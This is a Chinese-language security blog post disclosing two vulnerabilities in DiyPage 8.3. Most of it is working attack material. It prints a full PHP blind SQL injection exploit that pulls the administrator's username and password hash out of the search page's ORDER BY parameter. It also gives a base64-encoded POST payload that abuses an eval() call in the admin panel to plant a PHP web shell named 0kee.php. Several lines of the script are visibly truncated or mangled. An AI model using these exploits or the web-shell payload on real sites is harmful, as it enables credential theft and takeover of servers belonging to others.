DiyPage8.3 orderby blind SQL injection && code execution

  • A+
所属分类:lcx

- 从核心降荣誉  从荣誉贬会员   现在连ID也要被清了。。  鸭梨山大

一、前台注入

moddpcmsjssearchsubmit.php

第36行

$srchorder= $_GET['srchorder'] ? $_GET['srchorder'] : 'eid';

第52行

        $sql='SELECT eid,builddate,title,author,content';
        $sql.=' FROM '.DP_DBPREFIX.'cms_entry WHERE active=1 AND';
        。。。。。。
        。。。。。。。。。。。
               $sql.=' ORDER BY '.$srchorder.' '.$ascdesc;
        $sql.=' LIMIT '.$offset.','.$srchtotal;
        $query=$db->query($sql);

猪肉点在order by后面  又无错误回显  只能盲注

EXP:(参考了Flyh4t的代码)

print_r('
--------------------------------------------------------------------------------
DiyPage8.3 js.php orderby blind SQL injection exploit

BY xZL && 大蝉
Team: http://www.0kee.com
Thx for Flyh4t
--------------------------------------------------------------------------------
');

if ($argc
print_r('
--------------------------------------------------------------------------------
Usage: php '.$argv[0].' host path
host: target server (ip/hostname)
path: path to Diypage
Example:
php '.$argv[0].' localhost /
--------------------------------------------------------------------------------
');
die;
}

function sendpacketii($packet)
{
global $host, $html;
$ock=fsockopen(gethostbyname($host),'80');
if (!$ock) {
echo 'No response from '.$host; die;
}
fputs($ock,$packet);
$html='';
while (!feof($ock)) {
$html.=fgets($ock);
}
fclose($ock);
}

$host=$argv[1];
$path=$argv[2];
$prefix="dp_"; //表前缀
$search_keywords=""; //搜索关键字
$inject_keywords=""; //注入关键字(正常页面)
$cookie="";

if (($path[0]'/') or ($path[strlen($path)-1]'/'))
{echo 'Error... check the path!'; die;}

$chars[0]=0;//null
$chars=array_merge($chars,range(48,57)); //numbers
$chars=array_merge($chars,range(97,102));//a-f letters
echo "[~]exploting now,plz waitingrn";

/*get password*/
$j=1;$password="";
while (!strstr($password,chr(0)))
{
for ($i=0; $i
{
if (in_array($i,$chars))
{
$sql="srchorder=1+and+If(ASCII(SUBSTRING((SELECT+password+FROM+".$prefix."user_list+where+gid=2),".$j.",1))=".$i.",1,(SELECT+password+FROM+".$prefix."user_list))%23";
$packet ="GET ".$path."js.php?mod=dpcms&name=searchsubmit&srchperpage=10&keywords=$search_keywords&".$sql." HTTP/1.0rn";
$packet.="Host: ".$host."rn";
$packet.="Cookie: ".$cookie."rn";
$packet.="Connection: Closernrn";
sendpacketii($packet);
if (eregi($inject_keywords,$html)) {$password.=chr($i);echo"[+]password:".$password."rn";break;}
}
if ($i==255) {die("Exploit failed...");}
}
$j++;
}

/*get userid*/
$j=1;$admin="";
while (!strstr($admin,chr(0)))
{
for ($i=0; $i
{
$sql="srchorder=1+and+If(ASCII(SUBSTRING((SELECT+username+FROM+".$prefix."user_list+where+gid=2),".$j.",1))=".$i.",1,(SELECT+username+FROM+".$prefix."user_list))%23";
$packet ="GET ".$path."js.php?mod=dpcms&name=searchsubmit&srchperpage=10&keywords=$search_keywords&".$sql." HTTP/1.0rn";
$packet.="Host: ".$host."rn";
$packet.="Cookie: ".$cookie."rn";
$packet.="Connection: Closernrn";
sendpacketii($packet);
if (eregi($inject_keywords,$html)) {$admin.=chr($i);echo"[+]username:".$admin."rn";break;}
if ($i==255) {die("Exploit failed...");}
}
$j++;
}

print_r('
--------------------------------------------------------------------------------
[+]username -> '.$admin.'
[+]password -> '.$password.'
--------------------------------------------------------------------------------
');
function is_hash($hash)
{
if (ereg("^[a-f0-9]{32}",trim($hash))) {return true;}
else {return false;}
}
if (is_hash($password)) {echo "Exploit succeeded...";}
else {echo "Exploit failed...";}
?>

二、后台代码执行

这是个类似于后门的洞子  但到底是不是   不敢断言

modspidercprule_import.php

第8行

if ($_POST['issubmit']==true) {
        $importarray=array();
        eval(b64($_POST['rulestr']));

以下是incfunc.php 里的b64函数

function b64($str,$encode=false) {
        if ($encode) {
                return '[b64]'.base64_encode($str);
        }else{
                if (substr($str,0,5)=='{b64}' or substr($str,0,5)=='[b64]') {
                        return base64_decode(str_replace(array('{b64}','[b64]'),'',$str));
                }else{
                        return $str;
                }
        }
}

EXP:

进后台后

http://localhost/admin.php?mod=modcp&formod=spider&item=ruleadm&do=import

提交以下POST包至此

issubmit=true&rulestr=[b64]JGZwID0gZm9wZW4oIjBrZWUucGhwIiwgInciKTtmd3JpdGUoJGZwLCAiPD9ldmFsKFwkX1BPU1RbMGtlZV0pOz8+Iik7ZmNsb3NlKCRmcCk7

根目录下生成0kee.php  密码0kee

文章来源于lcx.cc:DiyPage8.3 orderby blind SQL injection && code execution

相关推荐: 网趣网上购物系统旗舰版(免费版)SQL注入漏洞

---------------------------------------------------------------------- 版本:网趣网上购物系统旗舰版(免费版) 下载:http://www.cnhww.com/down.asp?id=6 -…

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: